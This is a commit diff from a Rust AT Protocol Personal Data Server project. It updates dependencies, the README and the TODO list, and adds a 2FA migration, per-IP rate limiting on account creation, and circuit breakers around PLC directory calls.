source = "registry+https://github.com/rust-lang/crates.io-index"
2845
+
checksum = "e6506c6c10786659413faa717ceebcb8f70731c0a60cbae39795fdf114519c1a"
2846
+
dependencies = [
2847
+
"bytemuck",
2848
+
"byteorder-lite",
2849
+
"color_quant",
2850
+
"gif",
2851
+
"image-webp",
2852
+
"moxcms",
2853
+
"num-traits",
2854
+
"png",
2855
+
"zune-core",
2856
+
"zune-jpeg",
2857
+
]
2858
+
2859
+
[[package]]
2860
+
name = "image-webp"
2861
+
version = "0.2.4"
2862
+
source = "registry+https://github.com/rust-lang/crates.io-index"
2863
+
checksum = "525e9ff3e1a4be2fbea1fdf0e98686a6d98b4d8f937e1bf7402245af1909e8c3"
2864
+
dependencies = [
2865
+
"byteorder-lite",
2866
+
"quick-error",
2867
+
]
2868
+
2869
+
[[package]]
2870
name = "indexmap"
2871
version = "1.9.3"
2872
source = "registry+https://github.com/rust-lang/crates.io-index"
···
3584
]
3585
3586
[[package]]
3587
+
name = "moxcms"
3588
+
version = "0.7.10"
3589
+
source = "registry+https://github.com/rust-lang/crates.io-index"
3590
+
checksum = "80986bbbcf925ebd3be54c26613d861255284584501595cf418320c078945608"
3591
+
dependencies = [
3592
+
"num-traits",
3593
+
"pxfm",
3594
+
]
3595
+
3596
+
[[package]]
3597
name = "multibase"
3598
version = "0.9.2"
3599
source = "registry+https://github.com/rust-lang/crates.io-index"
···
3669
"memchr",
3670
"minimal-lexical",
3671
]
3672
+
3673
+
[[package]]
3674
+
name = "nonzero_ext"
3675
+
version = "0.3.0"
3676
+
source = "registry+https://github.com/rust-lang/crates.io-index"
3677
+
checksum = "38bf9645c8b145698bb0b18a4637dcacbc421ea49bef2317e4fd8065a387cf21"
3678
3679
[[package]]
3680
name = "nu-ansi-term"
···
4099
checksum = "7edddbd0b52d732b21ad9a5fab5c704c14cd949e5e9a1ec5929a24fded1b904c"
4100
4101
[[package]]
4102
+
name = "png"
4103
+
version = "0.18.0"
4104
+
source = "registry+https://github.com/rust-lang/crates.io-index"
4105
+
checksum = "97baced388464909d42d89643fe4361939af9b7ce7a31ee32a168f832a70f2a0"
4106
+
dependencies = [
4107
+
"bitflags",
4108
+
"crc32fast",
4109
+
"fdeflate",
4110
+
"flate2",
4111
+
"miniz_oxide",
4112
+
]
4113
+
4114
+
[[package]]
4115
name = "polyval"
4116
version = "0.6.2"
4117
source = "registry+https://github.com/rust-lang/crates.io-index"
···
4268
]
4269
4270
[[package]]
4271
+
name = "pxfm"
4272
+
version = "0.1.27"
4273
+
source = "registry+https://github.com/rust-lang/crates.io-index"
4274
+
checksum = "7186d3822593aa4393561d186d1393b3923e9d6163d3fbfd6e825e3e6cf3e6a8"
4275
+
dependencies = [
4276
+
"num-traits",
4277
+
]
4278
+
4279
+
[[package]]
4280
+
name = "quanta"
4281
+
version = "0.12.6"
4282
+
source = "registry+https://github.com/rust-lang/crates.io-index"
4283
+
checksum = "f3ab5a9d756f0d97bdc89019bd2e4ea098cf9cde50ee7564dde6b81ccc8f06c7"
4284
+
dependencies = [
4285
+
"crossbeam-utils",
4286
+
"libc",
4287
+
"once_cell",
4288
+
"raw-cpuid",
4289
+
"wasi",
4290
+
"web-sys",
4291
+
"winapi",
4292
+
]
4293
+
4294
+
[[package]]
4295
+
name = "quick-error"
4296
+
version = "2.0.1"
4297
+
source = "registry+https://github.com/rust-lang/crates.io-index"
4298
+
checksum = "a993555f31e5a609f617c12db6250dedcac1b0a85076912c436e6fc9b2c8e6a3"
4299
+
4300
+
[[package]]
4301
name = "quinn"
4302
version = "0.11.9"
4303
source = "registry+https://github.com/rust-lang/crates.io-index"
···
4431
version = "0.3.2"
4432
source = "registry+https://github.com/rust-lang/crates.io-index"
4433
checksum = "d20581732dd76fa913c7dff1a2412b714afe3573e94d41c34719de73337cc8ab"
4434
+
4435
+
[[package]]
4436
+
name = "raw-cpuid"
4437
+
version = "11.6.0"
4438
+
source = "registry+https://github.com/rust-lang/crates.io-index"
4439
+
checksum = "498cd0dc59d73224351ee52a95fee0f1a617a2eae0e7d9d720cc622c73a54186"
4440
+
dependencies = [
4441
+
"bitflags",
4442
+
]
4443
4444
[[package]]
4445
name = "redox_syscall"
···
5209
checksum = "d5fe4ccb98d9c292d56fec89a5e07da7fc4cf0dc11e156b41793132775d3e591"
5210
5211
[[package]]
5212
+
name = "spinning_top"
5213
+
version = "0.3.0"
5214
+
source = "registry+https://github.com/rust-lang/crates.io-index"
5215
+
checksum = "d96d2d1d716fb500937168cc09353ffdc7a012be8475ac7308e1bdf0e3923300"
5216
+
dependencies = [
5217
+
"lock_api",
5218
+
]
5219
+
5220
+
[[package]]
5221
name = "spki"
5222
version = "0.6.0"
5223
source = "registry+https://github.com/rust-lang/crates.io-index"
···
6405
]
6406
6407
[[package]]
6408
+
name = "weezl"
6409
+
version = "0.1.12"
6410
+
source = "registry+https://github.com/rust-lang/crates.io-index"
6411
+
checksum = "a28ac98ddc8b9274cb41bb4d9d4d5c425b6020c50c46f25559911905610b4a88"
6412
+
6413
+
[[package]]
6414
name = "whoami"
6415
version = "1.6.1"
6416
source = "registry+https://github.com/rust-lang/crates.io-index"
···
7021
"quote",
7022
"syn 2.0.111",
7023
]
7024
+
7025
+
[[package]]
7026
+
name = "zune-core"
7027
+
version = "0.5.0"
7028
+
source = "registry+https://github.com/rust-lang/crates.io-index"
7029
+
checksum = "111f7d9820f05fd715df3144e254d6fc02ee4088b0644c0ffd0efc9e6d9d2773"
7030
+
7031
+
[[package]]
7032
+
name = "zune-jpeg"
7033
+
version = "0.5.6"
7034
+
source = "registry+https://github.com/rust-lang/crates.io-index"
7035
+
checksum = "f520eebad972262a1dde0ec455bce4f8b298b1e5154513de58c114c4c54303e8"
7036
+
dependencies = [
7037
+
"zune-core",
7038
+
]
+2
Cargo.toml
+2
Cargo.toml
···
16
cid = "0.11.1"
17
dotenvy = "0.15.7"
18
futures = "0.3.30"
19
+
governor = "0.10"
20
hkdf = "0.12"
21
hmac = "0.12"
22
aes-gcm = "0.10"
···
48
urlencoding = "2.1"
49
uuid = { version = "1.19.0", features = ["v4", "fast-rng"] }
50
iroh-car = "0.5.1"
51
+
image = { version = "0.25", default-features = false, features = ["jpeg", "png", "gif", "webp"] }
52
53
[features]
54
external-infra = []
+79
-51
README.md
+79
-51
README.md
···
1
-
# Lewis' BS PDS Sandbox
2
3
-
When I'm actually done then yeah let's make this into a proper official-looking repo perhaps under an official-looking account or something.
4
5
-
This project implements a Personal Data Server (PDS) implementation for the AT Protocol.
6
7
-
Uses PostgreSQL instead of SQLite, S3-compatible blob storage, and aims to be a complete drop-in replacement for Bluesky's reference PDS implementation.
8
9
-
In fact I aim to also implement a plugin system soon, so that we can add things onto our own PDSes on top of the default BS.
10
11
-
I'm also taking ideas on what other PDSes lack, such as an on-PDS webpage that users can access to manage their records and preferences.
12
13
-
:3
14
15
-
# Running locally
16
17
-
The reader will need rust installed locally.
18
19
-
I personally run the postgres db, and an S3-compatible object store with podman compose up db objsto -d.
20
21
-
Run the PDS directly:
22
23
-
just run
24
-
25
-
Configuration is via environment variables:
26
27
-
DATABASE_URL postgres connection string
28
-
S3_BUCKET blob storage bucket name
29
-
S3_ENDPOINT S3 endpoint URL (for MinIO etc)
30
-
AWS_ACCESS_KEY_ID S3 credentials
31
-
AWS_SECRET_ACCESS_KEY
32
-
AWS_REGION
33
-
PDS_HOSTNAME public hostname of this PDS
34
-
APPVIEW_URL appview to proxy unimplemented endpoints to
35
-
RELAYS comma-separated list of relay WebSocket URLs
36
37
-
Optional email stuff:
38
39
-
MAIL_FROM_ADDRESS sender address (enables email notifications)
40
-
MAIL_FROM_NAME sender name (default: BSPDS)
41
-
SENDMAIL_PATH path to sendmail binary
42
43
-
Development
44
45
-
just shows available commands
46
-
just test run tests (spins up postgres and minio via testcontainers)
47
-
just lint clippy + fmt check
48
-
just db-reset drop and recreate local database
49
50
-
The test suite uses testcontainers so you don't need to set up anything manually for running tests.
51
52
-
## What's implemented
53
54
-
Most of the com.atproto.* namespace is done. Server endpoints, repo operations, sync, identity, admin, moderation. The firehose websocket works. OAuth is not done yet.
55
56
-
See TODO.md for the full breakdown of what's done and what's left.
57
58
-
Structure
59
60
-
src/
61
-
main.rs server entrypoint
62
-
lib.rs router setup
63
-
state.rs app state (db pool, stores)
64
-
api/ XRPC handlers organized by namespace
65
-
auth/ JWT handling
66
-
repo/ postgres block store
67
-
storage/ S3 blob storage
68
-
sync/ firehose, relay clients
69
-
notifications/ email service
70
-
tests/ integration tests
71
-
migrations/ sqlx migrations
72
73
-
License
74
75
-
idk
···
1
+
# BSPDS, a Personal Data Server
2
3
+
A production-grade Personal Data Server (PDS) implementation for the AT Protocol.
4
5
+
Uses PostgreSQL instead of SQLite, S3-compatible blob storage, and is designed to be a complete drop-in replacement for Bluesky's reference PDS implementation.
6
7
+
## Features
8
9
+
- Full AT Protocol support, all `com.atproto.*` endpoints implemented
10
+
- OAuth 2.1 Provider. PKCE, DPoP, Pushed Authorization Requests
11
+
- PostgreSQL, prod-ready database backend
12
+
- S3-compatible object storage for blobs; works with AWS S3, UpCloud object storage, self-hosted MinIO, etc.
13
+
- WebSocket `subscribeRepos` endpoint for real-time sync
14
+
- Crawler notifications via `requestCrawl`
15
+
- Multi-channel notifications: email, discord, telegram, signal
16
+
- Per-IP rate limiting on sensitive endpoints
17
18
+
## Running Locally
19
20
+
Requires Rust installed locally.
21
22
+
Run PostgreSQL and S3-compatible object store (e.g., with podman/docker):
23
24
+
```bash
25
+
podman compose up db objsto -d
26
+
```
27
28
+
Run the PDS:
29
30
+
```bash
31
+
just run
32
+
```
33
34
+
## Configuration
35
36
+
### Required
37
38
+
| Variable | Description |
39
+
|----------|-------------|
40
+
| `DATABASE_URL` | PostgreSQL connection string |
41
+
| `S3_BUCKET` | Blob storage bucket name |
42
+
| `S3_ENDPOINT` | S3 endpoint URL (for MinIO, etc.) |
43
+
| `AWS_ACCESS_KEY_ID` | S3 credentials |
44
+
| `AWS_SECRET_ACCESS_KEY` | S3 credentials |
45
+
| `AWS_REGION` | S3 region |
46
+
| `PDS_HOSTNAME` | Public hostname of this PDS |
47
+
| `JWT_SECRET` | Secret for OAuth token signing (HS256) |
48
+
| `KEY_ENCRYPTION_KEY` | Key for encrypting user signing keys (AES-256-GCM) |
49
50
+
### Optional
51
52
+
| Variable | Description |
53
+
|----------|-------------|
54
+
| `APPVIEW_URL` | Appview URL to proxy unimplemented endpoints to |
55
+
| `CRAWLERS` | Comma-separated list of relay URLs to notify via `requestCrawl` |
56
57
+
### Notifications
58
59
+
At least one channel should be configured for user notifications (password reset, email verification, etc.):
60
61
+
| Variable | Description |
62
+
|----------|-------------|
63
+
| `MAIL_FROM_ADDRESS` | Email sender address (enables email via sendmail) |
64
+
| `MAIL_FROM_NAME` | Email sender name (default: "BSPDS") |
65
+
| `SENDMAIL_PATH` | Path to sendmail binary (default: /usr/sbin/sendmail) |
66
+
| `DISCORD_WEBHOOK_URL` | Discord webhook URL for notifications |
67
+
| `TELEGRAM_BOT_TOKEN` | Telegram bot token for notifications |
68
+
| `SIGNAL_CLI_PATH` | Path to signal-cli binary |
69
+
| `SIGNAL_SENDER_NUMBER` | Signal sender phone number (+1234567890 format) |
70
71
+
## Development
72
73
+
```bash
74
+
just # Show available commands
75
+
just test # Run tests (auto-starts postgres/minio, runs nextest)
76
+
just lint # Clippy + fmt check
77
+
just db-reset # Drop and recreate local database
78
+
```
79
80
+
## Project Structure
81
82
+
```
83
+
src/
84
+
main.rs Server entrypoint
85
+
lib.rs Router setup
86
+
state.rs AppState (db pool, stores, rate limiters, circuit breakers)
87
+
api/ XRPC handlers organized by namespace
88
+
auth/ JWT authentication (ES256K per-user keys)
89
+
oauth/ OAuth 2.1 provider (HS256 server-wide)
90
+
repo/ PostgreSQL block store
91
+
storage/ S3 blob storage
92
+
sync/ Firehose, CAR export, crawler notifications
93
+
notifications/ Multi-channel notification service
94
+
plc/ PLC directory client
95
+
circuit_breaker/ Circuit breaker for external services
96
+
rate_limit/ Per-IP rate limiting
97
+
tests/ Integration tests
98
+
migrations/ SQLx migrations
99
+
```
100
101
+
## License
102
103
+
TBD
+49
-37
TODO.md
+49
-37
TODO.md
···
81
- [x] Implement `com.atproto.sync.listBlobs`.
82
- [x] Crawler Interaction
83
- [x] Implement `com.atproto.sync.requestCrawl` (Notify relays to index us).
84
85
## Identity (`com.atproto.identity`)
86
- [x] Resolution
···
108
- [x] Implement `com.atproto.moderation.createReport`.
109
110
## Temp Namespace (`com.atproto.temp`)
111
-
- [ ] Implement `com.atproto.temp.checkSignupQueue` (signup queue status for gated signups).
112
113
## OAuth 2.1 Support
114
Full OAuth 2.1 provider for ATProto native app authentication.
115
- [x] OAuth Provider Core
116
- [x] Implement `/.well-known/oauth-protected-resource` metadata endpoint.
117
- [x] Implement `/.well-known/oauth-authorization-server` metadata endpoint.
118
-
- [x] Implement `/oauth/authorize` authorization endpoint (headless JSON mode).
119
- [x] Implement `/oauth/par` Pushed Authorization Request endpoint.
120
- [x] Implement `/oauth/token` token endpoint (authorization_code + refresh_token grants).
121
- [x] Implement `/oauth/jwks` JSON Web Key Set endpoint.
···
132
- [x] Client metadata fetching and validation.
133
- [x] PKCE (S256) enforcement.
134
- [x] OAuth token verification extractor for protected resources.
135
-
- [ ] Authorization UI templates (currently headless-only, returns JSON for programmatic flows).
136
-
- [ ] Implement `private_key_jwt` signature verification (currently rejects with clear error).
137
138
## OAuth Security Notes
139
140
-
I've tried to ensure that this codebase is not vulnerable to the following:
141
142
- Constant-time comparison for signature verification (prevents timing attacks)
143
- HMAC-SHA256 for access token signing with configurable secret
···
151
- All database queries use parameterized statements (no SQL injection)
152
- Deactivated/taken-down accounts blocked from OAuth authorization
153
- Client ID validation on token exchange (defense-in-depth against cross-client attacks)
154
155
### Auth Notes
156
-
- Algorithm choice: Using ES256K (secp256k1 ECDSA) with per-user keys. Ref PDS uses HS256 (HMAC) with single server key. Our approach provides better key isolation but differs from reference implementation.
157
-
- [ ] Support the ref PDS HS256 system too.
158
-
- Token storage: Now storing only token JTIs in session_tokens table (defense in depth against DB breaches). Refresh token family tracking enables detection of token reuse attacks.
159
-
- Key encryption: User signing keys encrypted at rest using AES-256-GCM with keys derived via HKDF from MASTER_KEY environment variable. Migration-safe: supports both encrypted (version 1) and plaintext (version 0) keys.
160
161
## PDS-Level App Endpoints
162
These endpoints need to be implemented at the PDS level (not just proxied to appview).
···
178
### Notification (`app.bsky.notification`)
179
- [x] Implement `app.bsky.notification.registerPush` (push notification registration, proxied).
180
181
-
## Deprecated Sync Endpoints (for compatibility)
182
-
- [ ] Implement `com.atproto.sync.getCheckout` (deprecated, still needed for compatibility).
183
-
- [ ] Implement `com.atproto.sync.getHead` (deprecated, still needed for compatibility).
184
-
185
-
## Misc HTTP Endpoints
186
-
- [ ] Implement `/robots.txt` endpoint.
187
-
188
-
## Record Schema Validation
189
-
- [ ] Handle this generically.
190
-
191
-
## Preference Storage
192
-
User preferences (for app.bsky.actor.getPreferences/putPreferences):
193
-
- [x] Create preferences table for storing user app preferences.
194
-
- [x] Implement `app.bsky.actor.getPreferences` handler (read from postgres, proxy fallback).
195
-
- [x] Implement `app.bsky.actor.putPreferences` handler (write to postgres).
196
-
197
## Infrastructure & Core Components
198
- [x] Sequencer (Event Log)
199
- [x] Implement a `Sequencer` (backed by `repo_seq` table).
···
206
- [x] Manage Repo Root in `repos` table.
207
- [x] Implement Atomic Repo Transactions.
208
- [x] Ensure `blocks` write, `repo_root` update, `records` index update, and `sequencer` event are committed in a single transaction.
209
-
- [ ] Implement concurrency control (row-level locking on `repos` table) to prevent concurrent writes to the same repo.
210
- [ ] DID Cache
211
- [ ] Implement caching layer for DID resolution (Redis or in-memory).
212
- [ ] Handle cache invalidation/expiry.
213
-
- [ ] Background Jobs
214
-
- [ ] Implement `Crawlers` service (debounce notifications to relays).
215
- [x] Notification Service
216
- [x] Queue-based notification system with database table
217
- [x] Background worker polling for pending notifications
218
- [x] Extensible sender trait for multiple channels
219
- [x] Email sender via OS sendmail/msmtp
220
-
- [ ] Discord bot sender
221
-
- [ ] Telegram bot sender
222
-
- [ ] Signal bot sender
223
- [x] Helper functions for common notification types (welcome, password reset, email verification, etc.)
224
- [x] Respect user's `preferred_notification_channel` setting for non-email-specific notifications
225
-
- [ ] Image Processing
226
-
- [ ] Implement image resize/formatting pipeline (for blob uploads).
227
- [x] IPLD & MST
228
- [x] Implement Merkle Search Tree logic for repo signing.
229
- [x] Implement CAR (Content Addressable Archive) encoding/decoding.
230
-
- [ ] Validation
231
-
- [ ] DID PLC Operations (Sign rotation keys).
232
-
- [ ] Fix any remaining TODOs in the code, everywhere, full stop.
233
234
-
## Web Management UI
235
A single-page web app for account management. The frontend (JS framework) calls existing ATProto XRPC endpoints - no server-side rendering or bespoke HTML form handlers.
236
237
### Architecture
···
81
- [x] Implement `com.atproto.sync.listBlobs`.
82
- [x] Crawler Interaction
83
- [x] Implement `com.atproto.sync.requestCrawl` (Notify relays to index us).
84
+
- [x] Deprecated Sync Endpoints (for compatibility)
85
+
- [x] Implement `com.atproto.sync.getCheckout` (deprecated).
86
+
- [x] Implement `com.atproto.sync.getHead` (deprecated).
87
88
## Identity (`com.atproto.identity`)
89
- [x] Resolution
···
111
- [x] Implement `com.atproto.moderation.createReport`.
112
113
## Temp Namespace (`com.atproto.temp`)
114
+
- [x] Implement `com.atproto.temp.checkSignupQueue` (signup queue status for gated signups).
115
+
116
+
## Misc HTTP Endpoints
117
+
- [x] Implement `/robots.txt` endpoint.
118
119
## OAuth 2.1 Support
120
Full OAuth 2.1 provider for ATProto native app authentication.
121
- [x] OAuth Provider Core
122
- [x] Implement `/.well-known/oauth-protected-resource` metadata endpoint.
123
- [x] Implement `/.well-known/oauth-authorization-server` metadata endpoint.
124
+
- [x] Implement `/oauth/authorize` authorization endpoint (with login UI).
125
- [x] Implement `/oauth/par` Pushed Authorization Request endpoint.
126
- [x] Implement `/oauth/token` token endpoint (authorization_code + refresh_token grants).
127
- [x] Implement `/oauth/jwks` JSON Web Key Set endpoint.
···
138
- [x] Client metadata fetching and validation.
139
- [x] PKCE (S256) enforcement.
140
- [x] OAuth token verification extractor for protected resources.
141
+
- [x] Authorization UI templates (HTML login form).
142
+
- [x] Implement `private_key_jwt` signature verification with async JWKS fetching.
143
+
- [x] HS256 JWT support (matches reference PDS).
144
145
## OAuth Security Notes
146
147
+
Security measures implemented:
148
149
- Constant-time comparison for signature verification (prevents timing attacks)
150
- HMAC-SHA256 for access token signing with configurable secret
···
158
- All database queries use parameterized statements (no SQL injection)
159
- Deactivated/taken-down accounts blocked from OAuth authorization
160
- Client ID validation on token exchange (defense-in-depth against cross-client attacks)
161
+
- HTML escaping in OAuth templates (XSS prevention)
162
163
### Auth Notes
164
+
- Dual algorithm support: ES256K (secp256k1 ECDSA) with per-user keys AND HS256 (HMAC) for compatibility with reference PDS.
165
+
- Token storage: Storing only token JTIs in session_tokens table (defense in depth against DB breaches). Refresh token family tracking enables detection of token reuse attacks.
166
+
- Key encryption: User signing keys encrypted at rest using AES-256-GCM with keys derived via HKDF from KEY_ENCRYPTION_KEY environment variable.
167
168
## PDS-Level App Endpoints
169
These endpoints need to be implemented at the PDS level (not just proxied to appview).
···
185
### Notification (`app.bsky.notification`)
186
- [x] Implement `app.bsky.notification.registerPush` (push notification registration, proxied).
187
188
## Infrastructure & Core Components
189
- [x] Sequencer (Event Log)
190
- [x] Implement a `Sequencer` (backed by `repo_seq` table).
···
197
- [x] Manage Repo Root in `repos` table.
198
- [x] Implement Atomic Repo Transactions.
199
- [x] Ensure `blocks` write, `repo_root` update, `records` index update, and `sequencer` event are committed in a single transaction.
200
+
- [x] Implement concurrency control (row-level locking via FOR UPDATE).
201
- [ ] DID Cache
202
- [ ] Implement caching layer for DID resolution (Redis or in-memory).
203
- [ ] Handle cache invalidation/expiry.
204
+
- [x] Crawlers Service
205
+
- [x] Implement `Crawlers` service (debounce notifications to relays).
206
+
- [x] 20-minute notification debounce.
207
+
- [x] Circuit breaker for relay failures.
208
- [x] Notification Service
209
- [x] Queue-based notification system with database table
210
- [x] Background worker polling for pending notifications
211
- [x] Extensible sender trait for multiple channels
212
- [x] Email sender via OS sendmail/msmtp
213
+
- [x] Discord webhook sender
214
+
- [x] Telegram bot sender
215
+
- [x] Signal CLI sender
216
- [x] Helper functions for common notification types (welcome, password reset, email verification, etc.)
217
- [x] Respect user's `preferred_notification_channel` setting for non-email-specific notifications
218
+
- [x] Image Processing
219
+
- [x] Implement image resize/formatting pipeline (for blob uploads).
220
+
- [x] WebP conversion for thumbnails.
221
+
- [x] EXIF stripping.
222
+
- [x] File size limits (10MB default).
223
- [x] IPLD & MST
224
- [x] Implement Merkle Search Tree logic for repo signing.
225
- [x] Implement CAR (Content Addressable Archive) encoding/decoding.
226
+
- [x] Cycle detection in CAR export.
227
+
- [x] Rate Limiting
228
+
- [x] Per-IP rate limiting on login (10/min).
229
+
- [x] Per-IP rate limiting on OAuth token endpoint (30/min).
230
+
- [x] Per-IP rate limiting on password reset (5/hour).
231
+
- [x] Per-IP rate limiting on account creation (10/hour).
232
+
- [x] Circuit Breakers
233
+
- [x] PLC directory circuit breaker (5 failures → open, 60s timeout).
234
+
- [x] Relay notification circuit breaker (10 failures → open, 30s timeout).
235
+
- [x] Security Hardening
236
+
- [x] Email header injection prevention (CRLF sanitization).
237
+
- [x] Signal command injection prevention (phone number validation).
238
+
- [x] Constant-time signature comparison.
239
+
- [x] SSRF protection for outbound requests.
240
241
+
## Lewis' fabulous mini-list of remaining TODOs
242
+
- [ ] DID resolution caching (valkey).
243
+
- [ ] Record schema validation (generic validation framework).
244
+
- [ ] Fix any remaining TODOs in the code.
245
+
246
+
## Future: Web Management UI
247
A single-page web app for account management. The frontend (JS framework) calls existing ATProto XRPC endpoints - no server-side rendering or bespoke HTML form handlers.
248
249
### Architecture
+16
migrations/202512211700_add_2fa.sql
+16
migrations/202512211700_add_2fa.sql
···
···
1
+
ALTER TABLE users ADD COLUMN two_factor_enabled BOOLEAN NOT NULL DEFAULT FALSE;
2
+
3
+
ALTER TYPE notification_type ADD VALUE 'two_factor_code';
4
+
5
+
CREATE TABLE oauth_2fa_challenge (
6
+
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
7
+
did TEXT NOT NULL REFERENCES users(did) ON DELETE CASCADE,
8
+
request_uri TEXT NOT NULL,
9
+
code TEXT NOT NULL,
10
+
attempts INTEGER NOT NULL DEFAULT 0,
11
+
created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
12
+
expires_at TIMESTAMPTZ NOT NULL DEFAULT NOW() + INTERVAL '10 minutes'
13
+
);
14
+
15
+
CREATE INDEX idx_oauth_2fa_challenge_request_uri ON oauth_2fa_challenge(request_uri);
16
+
CREATE INDEX idx_oauth_2fa_challenge_expires ON oauth_2fa_challenge(expires_at);
+65
-2
src/api/identity/account.rs
+65
-2
src/api/identity/account.rs
···
3
use axum::{
4
Json,
5
extract::State,
6
-
http::StatusCode,
7
response::{IntoResponse, Response},
8
};
9
use bcrypt::{DEFAULT_COST, hash};
···
16
use std::sync::Arc;
17
use tracing::{error, info, warn};
18
19
#[derive(Deserialize)]
20
#[serde(rename_all = "camelCase")]
21
pub struct CreateAccountInput {
···
38
39
pub async fn create_account(
40
State(state): State<AppState>,
41
Json(input): Json<CreateAccountInput>,
42
) -> Response {
43
info!("create_account called");
44
if input.handle.contains('!') || input.handle.contains('@') {
45
return (
46
StatusCode::BAD_REQUEST,
···
184
let user_id = match user_insert {
185
Ok(row) => row.id,
186
Err(e) => {
187
error!("Error inserting user: {:?}", e);
188
-
// TODO: Check for unique constraint violation on email/did specifically
189
return (
190
StatusCode::INTERNAL_SERVER_ERROR,
191
Json(json!({"error": "InternalError"})),
···
3
use axum::{
4
Json,
5
extract::State,
6
+
http::{HeaderMap, StatusCode},
7
response::{IntoResponse, Response},
8
};
9
use bcrypt::{DEFAULT_COST, hash};
···
16
use std::sync::Arc;
17
use tracing::{error, info, warn};
18
19
+
fn extract_client_ip(headers: &HeaderMap) -> String {
20
+
if let Some(forwarded) = headers.get("x-forwarded-for") {
21
+
if let Ok(value) = forwarded.to_str() {
22
+
if let Some(first_ip) = value.split(',').next() {
23
+
return first_ip.trim().to_string();
24
+
}
25
+
}
26
+
}
27
+
if let Some(real_ip) = headers.get("x-real-ip") {
28
+
if let Ok(value) = real_ip.to_str() {
29
+
return value.trim().to_string();
30
+
}
31
+
}
32
+
"unknown".to_string()
33
+
}
34
+
35
#[derive(Deserialize)]
36
#[serde(rename_all = "camelCase")]
37
pub struct CreateAccountInput {
···
54
55
pub async fn create_account(
56
State(state): State<AppState>,
57
+
headers: HeaderMap,
58
Json(input): Json<CreateAccountInput>,
59
) -> Response {
60
info!("create_account called");
61
+
62
+
let client_ip = extract_client_ip(&headers);
63
+
if state.rate_limiters.account_creation.check_key(&client_ip).is_err() {
64
+
warn!(ip = %client_ip, "Account creation rate limit exceeded");
65
+
return (
66
+
StatusCode::TOO_MANY_REQUESTS,
67
+
Json(json!({
68
+
"error": "RateLimitExceeded",
69
+
"message": "Too many account creation attempts. Please try again later."
70
+
})),
71
+
)
72
+
.into_response();
73
+
}
74
+
75
if input.handle.contains('!') || input.handle.contains('@') {
76
return (
77
StatusCode::BAD_REQUEST,
···
215
let user_id = match user_insert {
216
Ok(row) => row.id,
217
Err(e) => {
218
+
if let Some(db_err) = e.as_database_error() {
219
+
if db_err.code().as_deref() == Some("23505") {
220
+
let constraint = db_err.constraint().unwrap_or("");
221
+
if constraint.contains("handle") || constraint.contains("users_handle") {
222
+
return (
223
+
StatusCode::BAD_REQUEST,
224
+
Json(json!({
225
+
"error": "HandleNotAvailable",
226
+
"message": "Handle already taken"
227
+
})),
228
+
)
229
+
.into_response();
230
+
} else if constraint.contains("email") || constraint.contains("users_email") {
231
+
return (
232
+
StatusCode::BAD_REQUEST,
233
+
Json(json!({
234
+
"error": "InvalidEmail",
235
+
"message": "Email already registered"
236
+
})),
237
+
)
238
+
.into_response();
239
+
} else if constraint.contains("did") || constraint.contains("users_did") {
240
+
return (
241
+
StatusCode::BAD_REQUEST,
242
+
Json(json!({
243
+
"error": "AccountAlreadyExists",
244
+
"message": "An account with this DID already exists"
245
+
})),
246
+
)
247
+
.into_response();
248
+
}
249
+
}
250
+
}
251
error!("Error inserting user: {:?}", e);
252
return (
253
StatusCode::INTERNAL_SERVER_ERROR,
254
Json(json!({"error": "InternalError"})),
+24
-5
src/api/identity/plc/sign.rs
+24
-5
src/api/identity/plc/sign.rs
···
1
use crate::api::ApiError;
2
use crate::plc::{
3
-
create_update_op, sign_operation, PlcClient, PlcError, PlcService,
4
};
5
use crate::state::AppState;
6
use axum::{
···
14
use serde::{Deserialize, Serialize};
15
use serde_json::{json, Value};
16
use std::collections::HashMap;
17
-
use tracing::{error, info};
18
19
#[derive(Debug, Deserialize)]
20
#[serde(rename_all = "camelCase")]
···
166
};
167
168
let plc_client = PlcClient::new(None);
169
-
let last_op = match plc_client.get_last_op(did).await {
170
Ok(op) => op,
171
-
Err(PlcError::NotFound) => {
172
return (
173
StatusCode::NOT_FOUND,
174
Json(json!({
···
178
)
179
.into_response();
180
}
181
-
Err(e) => {
182
error!("Failed to fetch PLC operation: {:?}", e);
183
return (
184
StatusCode::BAD_GATEWAY,
···
1
use crate::api::ApiError;
2
+
use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError};
3
use crate::plc::{
4
+
create_update_op, sign_operation, PlcClient, PlcError, PlcOpOrTombstone, PlcService,
5
};
6
use crate::state::AppState;
7
use axum::{
···
15
use serde::{Deserialize, Serialize};
16
use serde_json::{json, Value};
17
use std::collections::HashMap;
18
+
use tracing::{error, info, warn};
19
20
#[derive(Debug, Deserialize)]
21
#[serde(rename_all = "camelCase")]
···
167
};
168
169
let plc_client = PlcClient::new(None);
170
+
let did_clone = did.clone();
171
+
let result: Result<PlcOpOrTombstone, CircuitBreakerError<PlcError>> = with_circuit_breaker(
172
+
&state.circuit_breakers.plc_directory,
173
+
|| async { plc_client.get_last_op(&did_clone).await },
174
+
)
175
+
.await;
176
+
177
+
let last_op = match result {
178
Ok(op) => op,
179
+
Err(CircuitBreakerError::CircuitOpen(e)) => {
180
+
warn!("PLC directory circuit breaker open: {}", e);
181
+
return (
182
+
StatusCode::SERVICE_UNAVAILABLE,
183
+
Json(json!({
184
+
"error": "ServiceUnavailable",
185
+
"message": "PLC directory service temporarily unavailable"
186
+
})),
187
+
)
188
+
.into_response();
189
+
}
190
+
Err(CircuitBreakerError::OperationFailed(PlcError::NotFound)) => {
191
return (
192
StatusCode::NOT_FOUND,
193
Json(json!({
···
197
)
198
.into_response();
199
}
200
+
Err(CircuitBreakerError::OperationFailed(e)) => {
201
error!("Failed to fetch PLC operation: {:?}", e);
202
return (
203
StatusCode::BAD_GATEWAY,
+34
-11
src/api/identity/plc/submit.rs
+34
-11
src/api/identity/plc/submit.rs
···
1
use crate::api::ApiError;
2
-
use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient};
3
use crate::state::AppState;
4
use axum::{
5
extract::State,
···
183
}
184
185
let plc_client = PlcClient::new(None);
186
-
if let Err(e) = plc_client.send_operation(did, &input.operation).await {
187
-
error!("Failed to submit PLC operation: {:?}", e);
188
-
return (
189
-
StatusCode::BAD_GATEWAY,
190
-
Json(json!({
191
-
"error": "UpstreamError",
192
-
"message": format!("Failed to submit to PLC directory: {}", e)
193
-
})),
194
-
)
195
-
.into_response();
196
}
197
198
if let Err(e) = sqlx::query!(
···
1
use crate::api::ApiError;
2
+
use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError};
3
